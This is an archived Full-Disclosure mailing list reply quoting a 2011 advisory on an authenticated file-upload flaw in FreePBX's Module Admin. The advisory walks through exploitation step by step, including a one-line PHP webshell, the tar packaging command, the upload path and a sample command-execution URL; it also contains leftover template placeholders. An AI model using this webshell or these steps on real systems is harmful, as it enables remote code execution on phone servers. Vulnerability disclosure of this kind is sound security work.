| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 9 Jun 2011 15:11:43 -0500
From: Tyler Borland <tborland1@...il.com>
To: Tiago Ferreira <tiago@...igatorteam.org>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: FreePBX - Module Administration Arbitrary
File Upload
So you need administrative access to upload the file?
On Thu, Jun 9, 2011 at 7:24 AM, Tiago Ferreira <tiago@...igatorteam.org>wrote:
> ====[ Alligator Security Team
> ]===============================================
>
> FreePBX - Module Administration Arbitrary File Upload
>
> Members: Tiago Ferreira < tiago SPAM alligatorteam.org >
>
> ====[ Table of Contents
> ]=====================================================
>
> 1. Overview
> 2. Detailed description
> 3. Other Contexts & Solutions
> 4. Thanks
> 5. References
>
> ====[ Overview
> ]==============================================================
>
> * Systems affected: FreePBX
> * Version: 2.9.0.6 (other versions may be affected)
> * Release date: [Example Date]
> * Impact: Remote command execution
>
> "FreePBX is an easy to use GUI (graphical user interface) that controls and
> manages Asterisk, the world's most popular open source telephony engine
> software. FreePBX has been developed and hardened by thousands of
> volunteers
> over tens of thousands man hours. FreePBX has been downloaded over
> 5,000,000
> times and estimates over 500,000 active phone systems."[1]
>
> The functionality Module Admin, available for authenticated users within
> the administrative interface of FreePBX, is prone to a vulnerability which
> enables an attacker to upload malicious PHP files, and thus, perform remote
> arbitrary code execution within the context of a web server user."
>
> ====[ Detailed description
> ]==================================================
>
> In order to exploit this vulnerability and execute remote commands on a
> vulnerable FreePBX instance, access to Module Admin (Admin > Setup > Module
> Admin or, Tools > Setup > Module Admin) is needed. This can be aquired by
> following the given steps:
>
> 1. Create a directory like: webshell
> 2. Get a PHP file web trojan (webshell.php)
>
> Ex.: <? if($_GET['cmd']) { system($_GET['cmd']); }?>
>
> 3. Put this file into the webshell directory and create a tarball. This zip
> file name needs to follow the given rule: name-version.[tar|tar.gz|tgz], to
> our webshell we will do this: tar -czvf webshell-1.0.tar.gz webshell/.
>
> 4. On the upload form, browse to the file wbshell-1.0.tar.gz and send it.
>
> When the file is uploaded with success, the path for accessing the trojan
> will be: /admin/modules/webshell/webshell.php.
>
> Now, the possibility for executing remote system commands is possible using
> the uploaded trojan.
>
> Ex: http://127.0.0.1/admin/modules/webshell/webshell.php?cmd=whoami
>
> ====[ Other Contexts & Solutions
> ]============================================
>
> Description of a possible use case of the mentioned vulnerability.
>
> Ex (DoS): A potential attacker could take advantage of this issue to
> disable
> the services provided by [software/device] for as long as the attacks
> occurs.
>
> ====[ Thanks/Acknowledgements
> ]===============================================
>
> - Joaquim Brasil < joaquim SPAM alligatorteam.org >
>
>
> ====[ References
> ]============================================================
>
> - [1] http://www.freepbx.org/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists